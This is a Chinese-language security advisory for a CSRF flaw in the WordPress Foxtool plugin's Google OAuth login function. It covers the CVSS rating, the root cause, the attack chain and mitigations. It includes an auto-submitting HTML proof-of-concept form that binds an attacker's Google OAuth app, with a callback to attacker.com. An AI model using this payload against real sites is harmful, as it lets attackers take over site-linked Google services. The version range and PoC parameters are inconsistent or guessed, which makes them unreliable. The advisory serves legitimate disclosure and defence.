CVE-2025-13408 WordPress Foxtool插件CSRF漏洞可劫持OAuth连接

漏洞信息

漏洞编号

CVE-2025-13408

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Foxtool All-in-One插件

漏洞概述

CVE-2025-13408是WordPress平台下Foxtool All-in-One插件的一个中危跨站请求伪造(CSRF)漏洞。该插件集成了联系人聊天按钮、自定义登录和媒体图片优化等功能，广泛应用于各类WordPress网站。漏洞存在于foxtool_login_google()函数中，由于缺少正确的CSRF令牌(nonce)验证，攻击者可以构造恶意请求诱骗已登录的管理员用户执行非预期的操作。具体而言，攻击者可以通过社会工程学手段，如发送钓鱼邮件或嵌入恶意链接，诱导管理员点击，从而在管理员不知情的情况下建立OAuth连接。一旦OAuth连接被劫持，攻击者可能获得对网站相关Google服务的未授权访问权限，进而可能导致数据泄露或进一步的攻击利用。该漏洞的CVSS评分为4.3，属于中等严重程度，攻击复杂度低但需要用户交互，机密性和完整性影响均为低。

技术细节

该漏洞的根本原因在于WordPress插件开发中常见的安全失误——未能正确实现CSRF保护机制。在foxtool_login_google()函数中，开发者未能调用wp_verify_nonce()或相关函数来验证请求的合法性。WordPress推荐使用nonce机制来防止CSRF攻击，正确的实现需要在表单中生成nonce（使用wp_nonce_field()），并在处理函数中验证（使用wp_verify_nonce()）。由于缺少这一关键验证，攻击者可以伪造请求并诱骗已认证的管理员执行敏感操作。攻击者需要构造一个指向/wp-admin/admin-post.php或类似管理端点的POST/GET请求，包含建立Google OAuth连接所需的参数。由于浏览器会自动携带目标网站的Cookie，服务器会认为这是来自合法管理员的请求。攻击成功的关键在于诱骗管理员点击恶意链接或访问包含自动提交表单的页面。修复方案是在foxtool_login_google()函数中添加nonce验证，并在前端表单中正确生成nonce字段。

攻击链分析

STEP 1

步骤1

攻击者注册恶意Google OAuth应用，获取Client ID和Client Secret，用于接收被攻击网站的OAuth回调

STEP 2

步骤2

攻击者制作包含CSRF payload的钓鱼页面，通常是一个自动提交的表单或恶意链接

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他渠道诱骗WordPress管理员访问恶意页面或点击链接

STEP 4

步骤4

受害者（管理员）的浏览器自动发送携带有效Session Cookie的请求到目标网站的foxtool_login_google()函数

STEP 5

步骤5

服务器因缺少nonce验证而认为请求合法，执行OAuth连接建立操作，将攻击者的Google账户与网站绑定

STEP 6

步骤6

攻击者通过已建立的OAuth连接访问网站关联的Google服务，可能造成数据泄露或进一步入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13408 -->
<!-- This PoC demonstrates the CSRF vulnerability in Foxtool plugin -->
<!-- It forces admin to establish OAuth connection with attacker's Google account -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack - CVE-2025-13408</title>
</head>
<body>
    <h1>CSRF Attack PoC for Foxtool Plugin</h1>
    <p>This page will automatically submit a forged request to establish OAuth connection.</p>
    
    <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="csrf-form">
        <!-- Required parameters for OAuth connection -->
        <input type="hidden" name="action" value="foxtool_google_connect">
        <input type="hidden" name="google_client_id" value="attacker-controlled-client-id">
        <input type="hidden" name="google_client_secret" value="attacker-controlled-secret">
        <input type="hidden" name="google_redirect_uri" value="https://attacker.com/oauth/callback">
        
        <!-- Additional required fields based on plugin implementation -->
        <input type="hidden" name="foxtool_google_nonce" value="">
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=foxtool-settings">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrf-form').submit();
    </script>
    
    <p>If you see this message, the attack may have failed or requires user interaction.</p>
</body>
</html>

<!-- Alternative: Link-based attack -->
<!-- <a href="http://target-site.com/wp-admin/admin-post.php?action=foxtool_google_connect&google_client_id=attacker&google_client_secret=attacker">Click here</a> -->

影响范围

Foxtool All-in-One plugin < 2.5.2

Foxtool All-in-One plugin <= 2.5.2

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 暂时禁用或删除Foxtool插件的Google OAuth功能；2) 限制管理员后台访问，仅允许受信任的IP地址访问/wp-admin/；3) 启用双因素认证(2FA)增强管理员账户安全；4) 监控管理操作日志，关注异常的OAuth配置变更；5) 对管理员进行安全意识培训，提醒不要点击可疑链接。